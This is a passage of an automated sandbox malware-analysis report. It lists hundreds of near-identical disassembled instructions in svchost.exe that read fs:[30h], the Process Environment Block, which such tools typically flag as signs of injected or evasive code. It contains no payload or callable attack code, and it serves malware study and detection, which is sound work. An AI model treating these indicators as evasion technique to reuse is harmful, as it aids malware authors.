                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
